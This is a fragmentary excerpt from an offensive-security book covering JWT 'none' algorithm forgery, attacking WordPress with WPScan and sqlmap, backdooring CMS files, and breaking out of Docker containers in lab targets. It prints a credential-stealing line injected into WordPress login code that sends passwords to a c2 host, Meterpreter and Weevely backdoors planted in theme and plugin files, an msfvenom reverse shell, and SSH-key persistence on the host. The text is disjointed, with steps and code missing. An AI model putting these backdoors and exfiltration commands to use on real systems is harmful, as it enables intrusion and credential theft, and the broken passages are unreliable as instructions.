Base64, with the exception of replacing the characters + with -
and / with _.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
.
eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dH
J1ZSwidHMiOjEwNDUwNzc1MH0
.
TstDSAEDcXFE2Q5SJMWWKIsXV3_krfE4EshejZXnnZw
The first chunk is the header, describing the algorithm used for
signing. In this case, HMAC with SHA-256. The type is defined as a
JWT.
> atob('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9')
"{"alg":"HS256","typ":"JWT"}"
>
atob('eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1p
biI6dHJ1ZSwidHMiOjEwNDUwNzc1MH0')
"
{"id":"1","user":"admin","is_admin":true,"ts":1045
07750}"
JWT quirks
While this process is currently cryptographically safe, there are a few
ways we can play with this token to try to fool poor API
implementations.
First of all, while the header and the payload are signed, we can
actually modify them. The token data is within our control. The only
portion we don't know is the secret key. If we modify the payload, the
signature will fail and we expect the server to reject our request.
Note
The full JWT RFC is available here:
https://tools.ietf.org/html/rfc7519.
Some JWT libraries will follow the standard and support this
particular algorithm as well. So, what happens when we use the
"none" algorithm with our preceding payload?
Our token would look like this, with no signature appended after the
last period:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0
.
eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dH
J1ZSwidHMiOjEwNDUwNzc1MH0
.
[blank]
The token will be verified and deemed valid if the server-side library
adheres to the JWT RFC. We can test this modified token using the
Burp Suite JSON Web Tokens extension, which can be downloaded
from the BApp Store:
We can enter the JWT value in the first field and supply a dummy
key. Since we are no longer using the keyed HMAC, this value will
be ignored. The extension should confirm that the signature and
JWT token are valid:
Figure 11.4: JWT with no signature deemed valid
Note
More information on this type of attack can be found on Auth0:
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-
libraries/.
Note
JWT4B is available for download on GitHub at
https://github.com/mvetsch/JWT4B.
Once we have downloaded the JWT4B JAR file to disk, we can load
it manually into Burp. In the Extender tab, under Extensions, click
the Add button:
In the Load Burp Extension popup window, we can tell Burp to load
the JWT4B JAR file from the location on disk:
Figure 11.6: Loading the JWT4B JAR extension file
Note
Postman is available in Free, Pro, and Enterprise versions at
https://www.getpostman.com/.
Installation
There are Linux, Mac, and Windows versions of the Postman client.
For simplicity's sake, we will use the Linux client on our attack
machine, Kali. Installation is fairly straightforward on Windows and
Mac, but on Linux you may need a couple of dependencies to get
going.
root@kali:~/tools# wget
https://dl.pstmn.io/download/latest/linux64 -O
postman.tar.gz
[...]
HTTP request sent, awaiting response... 200 OK
Length: 78707727 (75M) [application/gzip]
Saving to: 'postman.tar.gz'
[...]
We will extract the contents to disk in our tools directory using the
tar zxvf command, as shown:
root@kali:~/tools# ~/tools/Postman/Postman
Figure 11.8: Postman client running on Linux
The user interface is fairly self-explanatory for the most part. We can
enter an API URL, change the HTTP verb, pass in custom headers,
and even build a valid authorization with a couple of clicks.
As a test, we can issue the same request we made with curl earlier.
The response will appear in the Body tab, shown in the following
screenshot, with the option to beautify the contents. Postman can
automatically parse and format the response as XML, HTML, JSON,
or plaintext. This is a welcome feature when the response
is a massive blob of data:
Figure 11.9: Sample Postman request to the API
Upstream proxy
Postman also supports routing requests through either the system
proxy or a custom server. The wise choice is Burp or OWASP ZAP.
Once we import and run a collection, every request will be captured,
and ready to be inspected and replayed.
Under File and SETTINGS, there is a Proxy tab, which should let us
point to the local Burp proxy, 127.0.0.1 on port 8080 by default:
Figure 11.10: Postman upstream proxy configuration
The environment
In order to build effective collections, we should create a new
Postman environment for each target API. Postman environments
allow us to store data in variables that will prove useful for activities,
such as passing authorization tokens between requests within a
collection. To create a new environment, we can use the Create
New tab in the top-left corner:
The following figure shows a simple GET request queued to run in the
ECorp API environment:
Collections
As we said earlier, a collection is simply a list of API requests in a
particular sequence. They can be exported to JSON and imported
into any Postman client, making them really portable.
To showcase the power of Postman collections, we will create one
for our vulnerable API instance, api.ecorp.local, running on port
8081.
Note
The documentation can be found in the README.md for
https://github.com/mattvaldes/vulnerable-api.
{
"auth": {
"passwordCredentials": {
"username": "user1",
"password": "pass1"
}
}
}
{
"access": {
"token": {
"expires": "[Expiration Date]",
"id": "[Token]"
},
"user": {
"id": 1,
"name": "user1"
}
}
}
We can then pass the id value to the /user/1 endpoint via the X-
Auth-Token header and the request should succeed:
Once again, from the Create New button in the top-left, select
Collection:
Figure 11.16: Creating a new collection
All of the requests we've made are recorded in the History tab in the
workspace. We can highlight the ones we need for the collection and
click the Save button next to Send in the top-right corner:
Figure 11.18: Saving requests to a collection
At the bottom, we should see our new ECorp API collection and we
can select it to save our requests:
Repeat this process for any requests that must go into this collection.
When run, we expect our collection to get a new token in the first
request and make a second authenticated request to /user/1 using
the newly provided token:
For our Get Auth Token request in the ECorp API collection, the test
needs to inspect the response, parse it as JSON, and extract the
token ID. To pass it to another request, we can leverage the ECorp
API environment and store the data in a variable we call auth_token.
The first test simply checks to see whether the HTTP response from
the API was 200. Anything else will throw an error during the
collection run.
The second test will parse the response text as JSON and store it in
the local data variable. If you recall the hierarchy of the /tokens
response, we need to access the id value in the access.token field
using the JavaScript array notation: data['access']['token']['id'].
Our second request to /user/1 requires that we pass this value via
the X-Auth-Token header. To do this, we add a new custom header
and, for the value, we pull up a list of existing variables by typing {{
in the Value field. Postman will autocomplete existing variables for
us:
Collection Runner
Collections can be exported and imported using the familiar JSON
format. Importing is a straightforward drag-and-drop operation.
Developers and QAs can create these collections the same way we
did earlier, export them, and as part of the engagement, send the file
to us. This greatly simplifies our job of assessing the API, because
the time-consuming work has already been done.
If all goes well, we should see green across the board, as our tests
should have succeeded, meaning the authentication request was
successful, the token was extracted, and the user query returned
some data:
Figure 11.26: Successful Postman collection run
We can use all the tips and tricks we already know to find these
issues, with some exceptions.
HTTP/1.0 200 OK
Date: Tue, 24 Apr 2018 17:14:03 GMT
Server: WSGIServer/0.1 Python/2.7.11
Content-Length: 80
Content-Type: application/json
With APIs, we may still have hope. Web services are not typically
accessed directly in a decoupled environment. It is possible that this
particular API is leveraged by a web application. That error message
could eventually find its way into a browser, which may eventually
render our payload. What if all errors are logged by the web service
and later neatly rendered in a status dashboard that's only visible
internally? We would then have JavaScript code execution on any
analyst who inspects the state of the API.
APIs may be the latest trend for web and mobile applications, but
they're not that different from the usual HTTP application. In fact, as
we saw earlier, microservice architecture brings about some new
challenges when it comes to authentication, which can be exploited
alongside the usual server-side and client-side vulnerabilities.
Coming up in the next chapter, we will look at CMSs, and some ways
to discover and subvert them for fun and profit.
Chapter 12. Attacking CMS
In this chapter, we will discuss attacking CMSs and WordPress in
particular. It's hard to talk about web applications and not mention
WordPress. WordPress is so common on the internet that you will
likely come across many instances of it in your career. After all,
almost a third of all websites are running on the platform and it is by
far the most popular CMS.
Attackers love WordPress because the very thing that sets it apart
from the competition — a massive community — also makes it
difficult to secure. The reason WordPress has the lion's share of the
market is because users don't need technical expertise to operate a
foodie blog, and therein lies the problem. Those same non-technical
users are less likely to update plugins or apply core patches, let
alone harden their WordPress instance, and will not stray from that
baseline through the years.
It's easy to pick on WordPress, but Drupal and Joomla make great
targets as well. They suffer from the same problems with vulnerable
plugins and themes, and seldomly updated installations. WordPress
is the Goliath and we will focus our attention on it, but the attack
methodology will translate to any content management framework,
albeit the tools may differ slightly.
Application assessment
Just as we've done with other applications, when we come across a
WordPress or CMS instance, we have to do some reconnaissance:
look for low-hanging fruit and try to understand what we're up
against. There are a few tools to get us going and we will look at a
common scenario where they can help us to identify issues and
exploit them.
WPScan
The first thing attackers reach for when they encounter a WordPress
CMS application is usually WPScan. It is a well-built and frequently
updated tool used to discover vulnerabilities and even guess
credentials.
Username enumeration
Credential brute-forcing
Vulnerability scanning
Note
Using an upstream proxy with WPScan can generate a ton of
data in Burp's proxy history, especially when performing a
credential attack or active scan.
Proxying our scan through Burp gives us some control over the
outgoing connections:
Figure 12.1: Burp capturing WPScan web requests
Note
The default user agent (WPScan vX.X.X) can be changed with
the --user-agent switch or randomized with --random-agent.
Note
WPScan is available on Kali and most penetration testing
distributions. It can also be found on https://wpscan.org/ or
cloned from GitHub: https://github.com/wpscanteam/wpscan.
[!] Title:
WordPress <= 4.9.4 - Application Denial of Service
(DoS) (unpatched)
Reference:
https://wpvulndb.com/vulnerabilities/9021
Reference:
https://baraktawily.blogspot.fr/2018/02/how-to-
dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference:
https://thehackernews.com/2018/02/WordPress-dos-
exploit.html
Reference: https://cve.mitre.org/cgi-
bin/cvename.cgi?name=CVE-2018-6389
Active scans will test whether known plugin files are present in the
wp-content folder and alert on any existing vulnerabilities. This is
done by sending a ton of URL requests to known paths and if there's
a response, WPScan assumes the plugin is available.
searchsploit will list the Exploit Title and the associated Path,
which is relative to /usr/share/exploitdb/ on Kali distributions.
sqlmap
In order to confirm this vulnerability in our target, we can jump to
sqlmap, the de facto SQLi exploitation tool. sqlmap will help us to
quickly generate payloads to test for injection in all of the popular
Database Management Systems (DBMS), such as MySQL,
PostgreSQL, MS SQL, and even Microsoft Access. To launch a new
sqlmap session, we pass our full target URL via the -u parameter.
Notice that the target URL includes the GET query parameters as
well, with some dummy data. If we don't tell sqlmap to target gpid, it
will check every other parameter for injection as well. It makes for a
great SQLi discovery, not just exploitation. Thanks to our
searchsploit query, we know gpid is the vulnerable parameter and
we can focus our attack on it specifically, with the -p parameter.
root@kali:~# sqlmap -u
"http://cookingwithfire.local/wp-
content/plugins/google-document-embedder/view.php?
embedded=1&gpid=0" -p gpid
For the remaining tests, sqlmap will confirm the existence of the
vulnerability and save the state locally. Subsequent attacks on the
target will use the identified payload as a starting point to inject SQL
statements.
root@kali:~#
Note
If you want to test this vulnerable plugin in your own WordPress
instance, you can download version 2.5 of the Google Document
Embedder plugin from https://github.com/wp-plugins/google-
document-embedder/tags?after=2.5.1.
Droopescan
Although not as fully-featured as WPScan, droopescan does support
more than just WordPress as a scanning target. It is ideal for Drupal
instances and it can also do some basic scanning for Joomla.
Note
Arachni pre-compiled binaries can be found on
http://www.arachni-scanner.com/.
root@kali:~/tools/arachni/bin#
./arachni_web_create_user [email protected] A!WebOf-
Lies* root
User 'root' with e-mail address '[email protected]'
created with password 'A!WebOf-Lies*'.
root@kali:~/tools/arachni/bin#
Note
Take care to clear your shell history if this is a production
installation of Arachni.
root@kali:~/tools/arachni/bin# ./arachni_web
Puma 2.14.0 starting...
* Min threads: 0, max threads: 16
* Environment: development
* Listening on tcp://localhost:9292
::1 - - "GET /unauthenticated HTTP/1.1" 302 -
0.0809
[...]
::1 - - "GET /navigation HTTP/1.1" 304 - 0.0473
::1 - - "GET /profiles?
action=index&controller=profiles&tab=global
HTTP/1.1" 200 - 0.0827
::1 - - "GET /navigation HTTP/1.1" 304 - 0.0463
Default
Cross-Site Scripting (XSS)
SQL injection
To launch a new scan using the web UI, select New under Scans, as
shown:
Figure 12.3: Starting a new Arachni scan
The SQL injection scan profile in Arachni can also be used in a scan
to verify the issue we found earlier with WPScan, in the
cookingwithfire.local blog. This particular profile should complete
much faster than the default scan.
Figure 12.6: SQL injection found by Arachni
The keen eye will notice that Arachni found a time-based blind SQL
injection where sqlmap was able to confirm the vulnerability using an
error-based technique. Technically, both techniques can be used to
exploit this particular application, but the error-based technique is
preferred. Time-based injection attacks are inherently slow. If
Arachni finds a time-based blind SQL injection vulnerability, it may
be a good idea to aim sqlmap at the same URL and see whether
anything more reliable can be identified.
Backdooring the code
Once we obtain some access to a CMS instance, such as
WordPress, Drupal, or Joomla, there are a couple of ways to persist
or even escalate privileges horizontally or vertically. We can inject
malicious PHP code, which will allow us to gain shell access at will.
Code execution is great, but in some scenarios, we don't necessarily
need it. There are other ways to exploit the application. Alternatively,
we can modify the CMS core files to capture credentials in cleartext
as users and administrators log in.
Persistence
When attacking CMS installations, such as WordPress, we may find
ourselves with administrative credentials in hand. Maybe we
successfully enumerated users with WPScan and subsequently
brute-forced credentials for a privileged user. This is more common
than you'd expect, especially in environments where WordPress is
either temporarily stood up for development purposes or just brought
up and forgotten.
Let's explore this scenario using the --enumerate u option for wpscan:
The results show us at least two users that we can target for a login
brute-force attack. WPScan can brute-force the credentials for a
particular account using the --usernames switch and a wordlist
provided by --passwords.
After a short while, the credentials for mary are confirmed and we are
free to login as this user.
root@kali:~# msfconsole -q
Module options
(exploit/unix/webapp/wp_admin_shell_upload):
There are a few options we need to fill in with the right information
before we can launch the exploit and hopefully get a shell back.
We have to get a bit more creative to maintain our access to the site.
Thankfully, since it is so customizable, WordPress provides a file
editor for plugins and themes. If we can modify a theme file and
inject reverse shell code, every time we call it via the web, we will
have access. If the administrator password changes tomorrow, we
can still get back on.
Module options
(payload/php/meterpreter/reverse_tcp):
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid:
'\x00\xff'
-e <opt> The name of the encoder module to
use.
-f <opt> The output file name (otherwise
stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable
functional
-o <opt> A comma separated list of options in
VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format:
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,pe
rl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbap
plication,vbscript,asp,aspx,aspx-
exe,axis2,dll,elf,elf-so,exe,exe-only,exe-
service,exe-small,hta-psh,jar,jsp,loop-
vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-
net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-x <opt> The executable template to use
For a PHP payload, not many of these switches will have an impact.
We can generate the raw payload, which would be the PHP code for
the stager. We don't have to write it to a file; it's typically fairly small
and we can copy it straight from the terminal output.
To make sure our code blends in more with the rest of the 404.php
page, we can use a source code beautifier like CyberChef. Let's
take the non-Base64-encoded raw PHP code and run it through the
CyberChef tool.
Note
CyberChef is a great tool with a ton of features. Code
beautification is just scratching the surface of what it can do.
CyberChef is developed by GCHQ and available for free to use
online or to download at https://gchq.github.io/CyberChef
At this point, we can grab the beautified payload and paste it right
into the WordPress theme editor. We need to add the code
immediately before the get_header() function is called. This is
because 404.php was meant to be include()-d in another page that
loads the definition for this function. When we call the 404 page
directly, get_header() will not be defined and PHP will throw a fatal
error. Our shell code will not be executed. We have to be aware of
these types of issues when we are modifying anything on the target.
Ideally, if time permits, we setup a similar test environment and
check to see how the application handles our modifications.
The Meterpreter payload will fit nicely just above the get_header()
function on line 12, as shown:
Adding the code in this location should prevent any PHP errors from
interfering with our malicious code.
Figure 12.10: Our malicious payload blending in with the rest of 404.php
Exploit target:
Id Name
-- ----
0 Wildcard Target
We can now run the handler with the -j option, which will send it to
the background, ready for incoming connections from our victim:
meterpreter >
Credential exfiltration
Consider another scenario where we have exploited a vulnerability in
the website, granting us shell access to the server. Maybe the
WordPress site itself is patched and user passwords are complex,
but if the WordPress installation is hosted on a shared system, it is
not uncommon for attackers to gain shell access through an
unrelated component of the site. Perhaps we managed to upload a
web shell or even force the web server to spawn a reverse shell
back to our machine through a command injection flaw. In the earlier
scenario, we had guessed the password of mary, but what if we
wanted more? What if the blog owner msmith has access to other
systems?
[...]
Active sessions
===============
Let's load the module and set the SRVHOST and SRVPORT as shown:
Jobs
====
Id Name Payload
Payload opts
-- ---- -------
------------
0 Exploit: multi/ php/meterpreter/
tcp://attackhandler reverse_tcp
er.c2:4444
1 Auxiliary: server/socks4a
This WordPress database user will likely have limited access to the
server as well, but it should be enough for our purposes. We can see
the WordPress database and we can enumerate its tables and data:
PHP provides two handy functions we can inject into the wp_signon
function to exfiltrate the WordPress credentials quickly and easily.
@file_get_contents([c2 URL]);
For our credential stealer, we can use either one (or both) of the
following lines of code:
file_put_contents('wp-
content/uploads/.index.php.swp',
base64_encode(json_encode($_POST)) . PHP_EOL,
FILE_APPEND);
@file_get_contents('http://pingback.c2.spider.ml/p
ing.php?id=' .
base64_encode(json_encode($_POST)));
The backdoor code will be added just before the wp_signon function
returns. This ensures we only capture valid credentials. The
wp_signon function will return well before our code if the credentials
supplied are invalid.
<?php
/**
* Core User API
*
* @package WordPress
* @subpackage Users
*/
[...]
return $user;
}
file_put_contents('wp-
content/uploads/.index.php.swp',
base64_encode(json_encode($_POST)) . PHP_EOL,
FILE_APPEND);
@file_get_contents('http://pingback.c2.spider.ml/p
ing.php?id=' .
base64_encode(json_encode($_POST)));
wp_set_auth_cookie($user->ID,
$credentials['remember'], $secure_cookie);
/**
root@kali:~# curl -s
http://cookingwithfire.local/wp-
content/uploads/.index.php.swp | base64 -d
{"log":"msmith","pwd":"iYQN)e#a4s*rLe7ZhWhfS&^v","
wp-submit":"Log
In","redirect_to":"https:\/\/round-lake.dustinice.workers.dev:443\/http\/cookingwithfire.local\
/wp-admin\/","testcookie":"1"}
- Docker
The following figure illustrates how containers can run full application
stacks adjacent to each other without conflict. A notable difference
between this and the traditional VM is the kernel component.
Containers are possible because of the ability to isolate processes
using control groups (cgroups) and namespaces.
In the following figure, you can see the difference between Docker
containers and traditional hypervisors (VM software), such as
VMware, Hyper-V, or VirtualBox:
Figure 13.2: The difference between Docker containers and traditional hypervisors (source:
Docker)
Note
The VM package is available for download on NotSoSecure's
site: https://www.notsosecure.com/vulnerable-docker-vm/.
Once the VM is up and running, the console screen will display its
DHCP-issued IP address. For the sake of clarity, we will use
vulndocker.internal as the domain pointing to the Docker instance:
The next step in our attack will be running the wpscan tool and
looking for any low-hanging fruit, and gathering as much information
about the instance as possible.
Note
The wpscan tool is available on Kali and almost any other
penetration-testing-focused distribution. The latest version can
be pulled from https://github.com/wpscanteam/wpscan.
We can start our attack by issuing a wpscan command in the attack
machine terminal. By default, passive detection will be enabled to
look for available plugins, as well as various other rudimentary
checks. We can point the scanner to our application using the --url
switch, passing the full URL, including the port 8000, as the value.
The scan results for this instance are pretty dry. The Full Path
Disclosure (FPD) vulnerability may come in handy if we have to
blindly drop a shell on disk through a MySQL instance (as we've
done in previous chapters), or if we find a local file inclusion
vulnerability. The XML-RPC interface appears to be available, which
may come in handy a little later. For now, we will make a note of
these findings.
There are seemingly endless plugins for WordPress and most of the
WordPress-related breaches come from outdated and vulnerable
plugins. In our case, however, this simple blog does not use any
visible plugins. The default wpscan plugin enumeration is passive; if a
plugin is installed but not in use, it may not be detected. There is an
option to actively test for the existence of plugins using a predefined
database of known plugins.
This scan will run for a few minutes but in this scenario, it does not
return anything interesting. wpscan can also use some effective
information disclosure techniques in WordPress, which can reveal
some of the post authors and their respective login usernames.
Enumerating users will be the next activity and hopefully we can
attack the admin account, and move up to shell access.
[...]
[+] Starting the password brute forcer
Brute Forcing 'bob' Time: 00:01:23 <====
> (2916 / 10001) 29.15% ETA: 00:03:22
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | bob | | Welcome1 |
+----+-------+------+----------+
root@kali:~# msfconsole -q
msf >
If we are trying to stay under the radar and avoid detection, we can
opt for a more manual approach. Since we have full control over the
CMS, we can create a custom plugin and upload it, just as
Metasploit has done, or better yet, we can backdoor existing ones.
For this scenario, we won't be uploading the PHP shell to disk and
accessing it directly. Instead, we will modify an existing file and inject
the contents somewhere inside. There are several options available
to us, but we will go with the Hello Dolly plugin, which ships with
WordPress. The WordPress admin panel provides a Plugins >
Editor function, which allows the modification of plugin PHP code.
Attackers love applications that have this feature, as it makes
everyone's life much easier.
Our target is the hello.php file from the Hello Dolly plugin. The
majority of its contents will be replaced by the generated weevely
shell.php file, as shown in the following figure:
It's probably a good idea to leave the header intact, in case any
passing administrators glance at the plugin. We can also leave most
of the file intact, as long as it doesn't produce any unwanted error
messages. PHP warnings and parse errors will interfere with
Weevely and the backdoor will not work. We've seen that the wpscan
results suggest that this application does not suppress error
messages. For the sake of stealth, we have to remember this going
forward.
In the preceding code block, we have closed the <?php tag with ?>
before pasting in the Weevely shell contents. Once the file is
updated successfully, the Weevely shell can be accessed via the
URL, http://vulndocker.internal:8000/wp-
content/plugins/hello.php:
root@kali:~/tools# weevely
http://vulndocker.internal:8000/wp-
content/plugins/hello.php Dock3r%Knock3r
weevely> uname -a
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu
SMP x86_64 GNU/Linux
www-data@8f4bca8ef241:/var/www/html/wp-
content/plugins $
weevely> ifconfig
sh: 1: ifconfig: not found
weevely> wget
sh: 1: wget: not found
weevely> nmap
sh: 1: nmap: not found
weevely> curl
curl: try 'curl --help' or 'curl --manual' for
more information
Since the container does not have the nmap binary available, we can
download it with curl and make it executable with chmod. We'll use
/tmp/sess_[random] as the filename template, to try and blend in as
dummy session files, in case any administrator is glancing through
the system temp folder:
Just as with the nmap, we have to make the file an executable using
chmod and the +x parameter:
Now that we have some tools, we can get our bearings by running
the recently uploaded ifconfig command:
Now that we have an idea of what to look at, we can call up the nmap
binary (/tmp/sess_IWxvbCBwaHAgc2Vzc2lvbnMu) to do a quick service
scan on the container network:
root@kali:~# msfvenom -p
linux/x64/meterpreter/reverse_tcp LHOST=
192.168.1.193 LPORT=443 -f elf >
/root/tools/nix64_rev443
No platform was selected, choosing
Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the
payload
No encoder or badchars specified, outputting raw
payload
Payload size: 96 bytes
Final size of elf file: 216 bytes
We will have to set the PAYLOAD variable to a value that matches our
malware's:
The LHOST and LPORT should also reflect what the malware was
configured with, to ensure it is listening on the appropriate IP
address and port:
Finally, we can run the handler module to spawn a listener and wait
for incoming Meterpreter sessions:
Once that's done, we can upload and execute the reverse shell
nix64_rev443 onto the container. We can use Weevely to help us
with this as well:
With the malware safely in the target's temp folder, we have to make
it an executable using chmod, and finally, just call it directly:
Auxiliary action:
Name Description
---- -----------
Proxy
Note
ProxyChains is available on all penetration testing distros:
http://proxychains.sourceforge.net/.
The Nmap scan report for the content_ssh_1 container also had the
SSH port open, but this service is typically harder to exploit, short of
brute-forcing for weak credentials:
meterpreter >
Once back inside the Meterpreter session, we can drop further into
the target container's terminal using the shell Meterpreter
command:
meterpreter > shell
Process 230 created.
Channel 16 created.
We may not see the typical Linux prompt, but we can execute simple
Linux terminal commands, such as curl, to inspect the 8022 service
on the 172.18.0.2 container:
curl -s 172.18.0.2:8022
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css"
type="text/css" />
</head>
<body>
Note
Docker-SSH is available on Docker Hub and on
https://github.com/jeroenpeeters/docker-ssh.
root@kali:~# proxychains
curl -s 172.18.0.2:8022
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.2:8022-
<><>-OK
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css"
type="text/css" />
</head>
<body>
##################################################
#############
## Docker SSH ~ Because every container should be
accessible ##
##################################################
#############
## container | content_db_1
##
##################################################
#############
/ $
/ $ id
uid=0(root) gid=0(root) groups=0(root)
/ $
/ $ /bin/bash
root@13f0a3bb2706:/# ls -lah /var/run/docker.sock
srw-rw---- 1 root mysql 0 Aug 20 14:08
/var/run/docker.sock
This is all made possible by the exposed Docker socket found in the
/var/run/docker.sock. The Docker client used this special file to
communicate with the Docker host API and issue arbitrary
commands.
root@a39621d553e4:/# ls -lah /
total 76K
drwxr-xr-x 35 root root 4.0K Oct 7 01:38 .
drwxr-xr-x 35 root root 4.0K Oct 7 01:38 ..
-rwxr-xr-x 1 root root 0 Oct 7 01:38
.dockerenv
[...]
drwxr-xr-x 2 root root 4.0K Oct 7 01:38 home
drwxr-xr-x 22 root root 4.0K Aug 20 14:11 host
[...]
drwx------ 2 root root 4.0K Oct 7 01:38 root
[...]
root@a39621d553e4:/#
root@33f559573304:/# ps x
PID TTY STAT TIME COMMAND
1 ? Ss 0:04 /sbin/init
[...]
751 ? Ssl 1:03 /usr/bin/dockerd --raw-
logs
[...]
14966 ? R+ 0:00 ps x
Note
Remember the ROE and remove any artifacts, such as
authorized SSH keys, once the engagement has completed.
Back inside the container, we can append our key to the Docker
host's authorized_keys file, granting us root access through SSH
public key authentication:
From our attack box, we can pivot through our Meterpreter session,
get inside the container network, and authenticate to the SSH
service of 172.18.0.1, which we've previously suspected, based on
nmap results, belongs to the host:
ISBN: 978-1-78847-529-7
Monnappa K A
ISBN: 978-1-78839-250-1
ISBN: 978-1-78862-337-7
Zaid Sabih
ISBN: 978-1-78862-205-9
reference / Torify
Arachni
Arachni scan
attack, Auth0
B
BApp Store / Extending Burp
authentication / Authentication and authorization abuse
authorization / Authentication and authorization abuse, The
Autorize flow
Swiss Army knife / The Swiss Army knife
about / BeEF
reference / BeEF
hooking / Hooking
social engineering attacks / Social engineering attacks
social engineering modules / Social engineering attacks
keylogger / The keylogger
persistence / Persistence
automatic exploitation / Automatic exploitation
tunneling traffic / Tunneling traffic
/ Credential guessing
Burp Collaborator
about / Burp Collaborator
Public Collaborator server / Public Collaborator server
Private Collaborator server / Private Collaborator server
C
CDNJS
about / SOP
reference / SOP
CMS scanners
CO2 plugin
code
about / Collections
creating / Collections
CyberChef
Docker container
/ Droopescan
Drupal / CMS scanners
E
ElevenPaths / Metadata
Empire
reference / Social engineering attacks
external DTDs
F
file inclusion
file upload
about / Metadata
reference / Metadata
FuzzDB
Fuzzer module
G
gadget chain / Abusing deserialization
Gobuster / Content discovery
about / Gobuster
Google Cloud Engine
H
hash-based message authentication code (HMAC) / JWTs
Hash Toolkit
I
INetSim
INetSim binaries
JRuby
JWT4B
JWT RFC
JWTs
about / JWTs
characteristics / JWT quirks
Jython
K
Kali Linux / Kali Linux
reference / BeEF
M
malicious advertising (malvertising) / SOP
man-in-the-browser (MITB) attack / Persistence
man-in-the-middle (MITM) attack / Persistence
MariaDB service / Network assessment
masscan / Masscan
Metasploit Framework (MSF) / Target mapping
Meterpreter / Situational awareness
Microsoft Azure
N
network assessment / Network assessment
Nikto
about / Nikto
download link / Nikto
O
obfuscating code / Obfuscating code
open-source intelligence (OSINT) / Types of assessments
Open Authorization (OAuth) / API keys
out-of-band exploitation
OWASP ZAP
P
Packagist
reference / Abusing deserialization
persistence / Persistence
persistent content discovery / Persistent content discovery
persistent XSS attack / Persistent XSS
polyglot payload
port scanner
Postman
about / Postman
reference / Postman
installing / Installation
upstream proxy / Upstream proxy
environment / The environment
collections / Collections
ProxyChains
R
reflected XSS attack / Reflected XSS
regex101
REST
about / REST
S
same-origin policy (SOP)
about / SOP
SecLists
about / SOAP
reference / SOAP
T
target mapping
about / Torify
reference / Torify
Torsocks
reference / Torify
U
Universal Naming Convention (UNC) / A common scenario
upstream SOCKS proxy
configuring / Torify
V
vulnerable Docker
W
web application firewalls (WAFs) / Communication
Web Services Description Language (WSDL) / SOAP
Web shells / Web shells
Weevely shell
WhatWeb
about / WhatWeb
reference / WhatWeb
by VM / Foothold
WPScan
wpscan tool
reference / Foothold
X
XML bomb attack
XXE attacks
Y
ysoserial
Z
Zed Attack Proxy (ZAP) / Zed Attack Proxy